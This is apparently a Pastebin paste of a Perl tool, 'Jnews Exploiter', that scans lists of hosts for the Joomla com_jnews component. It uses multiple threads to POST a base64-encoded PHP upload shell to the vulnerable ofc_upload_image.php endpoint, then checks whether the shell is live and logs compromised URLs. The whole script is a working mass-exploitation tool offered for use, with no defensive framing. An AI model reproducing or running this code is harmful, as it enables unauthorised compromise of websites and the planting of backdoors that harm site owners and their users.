Advertisement
AbdulMuttaqin

Jnews Exploiter

Jul 20th, 2018
558
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.40 KB | None | 0 0
  1.  
  2. #!/usr/bin/perl
  3. # Module Needed :)
  4. use strict;
  5. no warnings;
  6. use threads;
  7. use threads::shared;
  8. use LWP::UserAgent;
  9. use HTTP::Request;
  10. use LWP::Simple;
  11. use HTTP::Request::Common;
  12. use Term::ANSIColor;
  13. use Win32::Console::ANSI;
  14. use MIME::Base64;
  15. ##############################
  16. if($^O =~ /Win/){
  17.    system("cls");
  18. }else{
  19.    system("clear");
  20. }
  21. my $ua = LWP::UserAgent->new;
  22. $ua->timeout(15);
  23. $ua->agent('Mozilla/5.0');
  24. print color("bold red"),"[+] Com_jnews Joomla Components RCI Exploits Scanner (Threads on) \n";
  25. print color("bold red"),"[+] coded by Mr_AnarShi-T\n";
  26. print color("bold red"),"[+] Gr33T's : Boy Security & cold Zero & Dod & Normal & Orange man & all \n";
  27. print color("bold red"),"[+] Home : Www.site.com & My Lab :) \n\n";
  28. print color 'reset';
  29. print color("green"),"[+] Enter File : ";
  30. print color 'reset';
  31. my $file=<STDIN>;
  32. chomp($file);
  33. print color("green"),"\n[+] Enter Thread Number : ";
  34. print color 'reset';
  35. my $thread=<STDIN>;
  36. chomp($thread);
  37. my $threads = $thread;
  38. my @linkz : shared;
  39. my @paths : shared;
  40. GetLinks();
  41. while (threads->list) {}
  42. print color ('green');
  43. print "\n[+] Link Founded : ";
  44. print color 'reset';
  45. print"".scalar(@linkz)."\n\n";
  46. CheckLinks();
  47. while (threads->list) {}
  48. sub GetLinks {
  49.         open( LNK, "$file" ) or die "$!\n";
  50.         while( defined( my $line_ = <LNK> ) ) {
  51.                 chomp( $line_ );
  52.                 push( @linkz, $line_ );
  53.         }
  54.         close( LNK );
  55. }
  56. sub CheckLinks {
  57.         foreach my $link( @linkz ) {
  58.                 my  $ctr = 0;
  59.                 foreach my $thr ( threads->list ) { $ctr++; }
  60.                 if ($ctr < $threads){
  61.                         threads->create( \&CheckLinkz_exploits,$link );
  62.                 }
  63.                 else { redo; }
  64.         }
  65. }
  66. sub CheckLinkz_exploits {
  67. my $link = shift ;
  68. chomp ($link);
  69. my $site_vul = "http://".$link . "/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=m-a.php";
  70. my $encoded = "PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgTXJfQW5hclNoaS1UIDwvdGl0bGU+JzsNCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyDQoiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCINCmlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCiAgICAgICAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnDQo8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9iPjxicj48YnI+JzsgfQ0KICAgICAgICBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWxlZCAhISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
  71. my $evil = decode_base64($encoded);
  72. my $res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $evil);
  73. print "[+] Checking $link\n\n";
  74. if ($res->is_success){
  75. print "[+] $link is vul\n";
  76. print "[+] Checking If The Evil code Was Uploded\n";
  77. my $vul="/components/com_jnews/includes/openflashchart/tmp-upload-images/m-a.php";
  78. my $url = "http://".$link. $vul;
  79. my $request = HTTP::Request->new(GET=>$url);
  80. my $useragent = LWP::UserAgent->new();
  81. my $response = $useragent->request($request);
  82. if ($response->content=~m/<title>Upload Files Mr_AnarShi-T <\/title>/g){
  83. print color("yellow"),"[.] Found => $url\n\n";
  84. print color 'reset';
  85. open(BEN,">>result-$link.txt");
  86. print BEN "$url\n";
  87. close(BEN);
  88. }
  89. else
  90. {
  91. print "[.] Not Found \n";
  92. }
  93. }
  94. threads->detach();
  95. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement